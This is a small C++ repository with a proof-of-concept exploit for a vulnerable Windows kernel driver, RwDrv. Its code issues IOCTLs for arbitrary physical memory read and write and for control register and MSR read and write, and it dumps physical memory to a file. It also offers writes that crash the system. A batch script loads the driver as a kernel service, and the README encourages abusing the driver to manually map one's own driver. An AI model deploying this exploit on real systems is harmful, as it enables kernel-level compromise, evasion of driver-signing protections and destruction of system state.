├── ArbitaryPhysRW_RegManipulation_PoC.sln
├── ArbitaryPhysRW_RegManipulation_PoC
    ├── ArbitaryPhysRW_RegManipulation_PoC.cpp
    ├── ArbitaryPhysRW_RegManipulation_PoC.vcxproj
    ├── ArbitaryPhysRW_RegManipulation_PoC.vcxproj.filters
    └── ArbitaryPhysRW_RegManipulation_PoC.vcxproj.user
├── LICENSE
├── Load.bat
└── README.md


/ArbitaryPhysRW_RegManipulation_PoC.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31515.178
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ArbitaryPhysRW_RegManipulation_PoC", "ArbitaryPhysRW_RegManipulation_PoC\ArbitaryPhysRW_RegManipulation_PoC.vcxproj", "{6472CCE7-22B7-4130-B186-B39A4BD74669}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x64.Build.0 = Debug|x64
18 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x86.Build.0 = Debug|Win32
20 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x64.ActiveCfg = Release|x64
21 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x64.Build.0 = Release|x64
22 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x86.ActiveCfg = Release|Win32
23 | 		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {78EEDB51-4A36-4BF2-B468-9D95AFAE7A58}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <fstream>
  3 | 
  4 | struct PhysRW_t
  5 | {
  6 | 	uint64_t PhysicalAddress;
  7 | 	DWORD Size;
  8 | 	DWORD Unknown;
  9 | 	uint64_t Address;
 10 | };
 11 | 
 12 | struct RegRW_t
 13 | {
 14 | 	DWORD Register;
 15 | 	uint64_t Value;
 16 | };
 17 | 
 18 | struct MSRRW_t
 19 | {
 20 | 	DWORD Low;
 21 | 	DWORD Unknown;
 22 | 	DWORD Register;
 23 | 	DWORD High;
 24 | };
 25 | 
 26 | #define LAST_IND(x,part_type)    (sizeof(x)/sizeof(part_type) - 1)
 27 | #define HIGH_IND(x,part_type)  LAST_IND(x,part_type)
 28 | #define LOW_IND(x,part_type)   0
 29 | #define DWORDn(x, n)  (*((DWORD*)&(x)+n))
 30 | #define HIDWORD(x) DWORDn(x,HIGH_IND(x,DWORD))
 31 | #define __PAIR64__(high, low)   (((uint64_t) (high) << 32) | (uint32_t)(low))
 32 | 
 33 | 
 34 | class RwDrv
 35 | {
 36 | public:
 37 | 	RwDrv()
 38 | 	{
 39 | 		h = CreateFileA("\\\\.\\RwDrv", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
 40 | 		if (h == INVALID_HANDLE_VALUE)
 41 | 		{
 42 | 			printf("Driver Not Loaded!\n");
 43 | 			Sleep(3000);
 44 | 			exit(0);
 45 | 		}
 46 | 	}
 47 | 
 48 | 	~RwDrv()
 49 | 	{
 50 | 		CloseHandle(h);
 51 | 	}
 52 | 
 53 | 	void PhysicalRead(uint64_t Address, uint64_t* Address2, DWORD Size)
 54 | 	{
 55 | 		PhysRW_t A;
 56 | 
 57 | 		A.PhysicalAddress = Address;
 58 | 		A.Address = (uint64_t)Address2;
 59 | 		A.Unknown = 0;
 60 | 		A.Size = Size;
 61 | 
 62 | 		DeviceIoControl(h, 0x222808, &A, sizeof(A), &A, sizeof(A), 0, 0);
 63 | 	}
 64 | 
 65 | 	void PhysicalWrite(uint64_t Address, uint64_t* Address2, DWORD Size)
 66 | 	{
 67 | 		PhysRW_t A;
 68 | 
 69 | 		A.PhysicalAddress = Address;
 70 | 		A.Address = (uint64_t)Address2;
 71 | 		A.Unknown = 0;
 72 | 		A.Size = Size;
 73 | 
 74 | 		DeviceIoControl(h, 0x22280C, &A, sizeof(A), 0, 0, 0, 0);
 75 | 	}
 76 | 
 77 | 	// CR0: 0, CR2: 2, CR3: 3, CR4: 4, IRQL: 8
 78 | 	void ReadControlRegister(int Register, uint64_t* Value)
 79 | 	{
 80 | 		RegRW_t A;
 81 | 
 82 | 		A.Register = Register;
 83 | 		A.Value = 0;
 84 | 
 85 | 		DeviceIoControl(h, 0x22286C, &A, sizeof(A), &A, sizeof(A), 0, 0);
 86 | 		*Value = A.Value;
 87 | 	}
 88 | 
 89 | 	// CR0: 0, CR3: 3, CR4: 4, CR8: 8
 90 | 	// Keep in mind that this function does NOT disable interrupts, meaning writing for example cr0 will result in a bsod.
 91 | 	void WriteControlRegister(int Register, uint64_t Value)
 92 | 	{
 93 | 		RegRW_t A;
 94 | 
 95 | 		A.Register = Register;
 96 | 		A.Value = Value;
 97 | 
 98 | 		DeviceIoControl(h, 0x222870, &A, sizeof(A), &A, sizeof(A), 0, 0);
 99 | 	}
100 | 
101 | 	// Read and write msr is very wierd in this driver, it splits the lower and higher bits of the value in the struct.
102 | 	void ReadMSR(int Register, uint64_t* Value)
103 | 	{
104 | 		MSRRW_t A;
105 | 		A.Register = Register;
106 | 		A.Low = 0;
107 | 		A.High = 0;
108 | 
109 | 		DeviceIoControl(h, 0x222874, &A, sizeof(A), &A, sizeof(A), 0, 0);
110 | 
111 | 		*Value = __PAIR64__(A.High, A.Low);
112 | 	}
113 | 
114 | 	void WriteMSR(int Register, uint64_t Value)
115 | 	{
116 | 		MSRRW_t A;
117 | 		A.Register = Register;
118 | 		A.Low = *(DWORD*)&Value;
119 | 		A.High = HIDWORD(Value);
120 | 
121 | 		DeviceIoControl(h, 0x22284C, &A, sizeof(A), &A, sizeof(A), 0, 0);
122 | 	}
123 | 
124 | private:
125 | 	HANDLE h;
126 | };
127 | 
128 | 
129 | void WriteFileToDisk(const char* FileName, uint64_t Buffer, DWORD Size)
130 | {
131 | 	std::ofstream File(FileName, std::ios::binary);
132 | 	File.write((char*)Buffer, Size);
133 | 	File.close();
134 | }
135 | 
136 | int main()
137 | {
138 | 	RwDrv* Drv = new RwDrv();
139 | 
140 | 	uint64_t CR0, CR2, CR3, CR4, IRQL;
141 | 
142 | 	Drv->ReadControlRegister(0, &CR0);
143 | 	Drv->ReadControlRegister(2, &CR2);
144 | 	Drv->ReadControlRegister(3, &CR3);
145 | 	Drv->ReadControlRegister(4, &CR4);
146 | 	Drv->ReadControlRegister(8, &IRQL);
147 | 
148 | 	printf("CR0: 0x%llx\n", CR0);
149 | 	printf("CR2: 0x%llx\n", CR2);
150 | 	printf("CR3: 0x%llx\n", CR3);
151 | 	printf("CR4: 0x%llx\n", CR4);
152 | 	printf("IRQL: 0x%llx\n", IRQL);
153 | 
154 | 	DWORD SizeToDumpToDisk = 0xFFFF;
155 | 	uint64_t AllocatedTempMem = (uint64_t)VirtualAlloc(0, SizeToDumpToDisk, MEM_COMMIT, PAGE_READWRITE);
156 | 
157 | 	// Read it in chunks of 8 bytes to save calls, you can read the entire page if you like to.
158 | 	for (int i = 0; i < (SizeToDumpToDisk / 8); i++)
159 | 		Drv->PhysicalRead(i * 8, (uint64_t*)(AllocatedTempMem + i * 8), 8);
160 | 
161 | 	WriteFileToDisk("PhysMemDmp.bin", AllocatedTempMem, SizeToDumpToDisk);
162 | 	VirtualFree((void*)AllocatedTempMem, 0, MEM_RELEASE);
163 | 
164 | 
165 | 	int Ret = MessageBoxA(0, "Would you like to bsod via writing physical memory?", "Physical Memory Write Test", MB_ICONQUESTION | MB_YESNO);
166 | 	if (Ret == IDYES)
167 | 	{
168 | 		for (int i = 0; i < 0xFFFF; i++)
169 | 			Drv->PhysicalWrite(i * 4, (uint64_t*)&SizeToDumpToDisk, 4);
170 | 	}
171 | 
172 | 	Ret = MessageBoxA(0, "Would you like to bsod via writing cr3?", "Control Register Write Test", MB_ICONQUESTION | MB_YESNO);
173 | 	if (Ret == IDYES)
174 | 		Drv->WriteControlRegister(3, 0);
175 | 
176 | 
177 | 	Sleep(-1);
178 | }
179 | 


--------------------------------------------------------------------------------
/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{6472cce7-22b7-4130-b186-b39a4bd74669}</ProjectGuid>
 25 |     <RootNamespace>ArbitaryPhysRWRegManipulationPoC</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="ArbitaryPhysRW_RegManipulation_PoC.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------
/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="ArbitaryPhysRW_RegManipulation_PoC.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2021 Xenia0
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Load.bat:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | 
 3 | xcopy %~dp0RwDrv.sys C:\
 4 | sc create RwDrv binpath=C:\RwDrv.sys type=kernel
 5 | sc start RwDrv
 6 | 
 7 | echo Press Enter To Unload
 8 | pause
 9 | 
10 | sc stop RwDrv
11 | sc delete RwDrv
12 | del /f C:\RwDrv.sys
13 | 
14 | pause


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Arbitrary Physical Memory + Control Register Read Write
2 | 
3 | So I found this driver in my downloads folder, and decided to give it a look in ida. Turns out this driver is very vulnerable as it provides full physical memory r/w, control register modification, pci read write, allocate + deallocate physical memory and more. I only wrote this PoC in 30 minutes and it has important functions like phys r/w, control register + msr r/w, you can take a look at this driver and abuse it to manual map your own driver and more.
4 | 


--------------------------------------------------------------------------------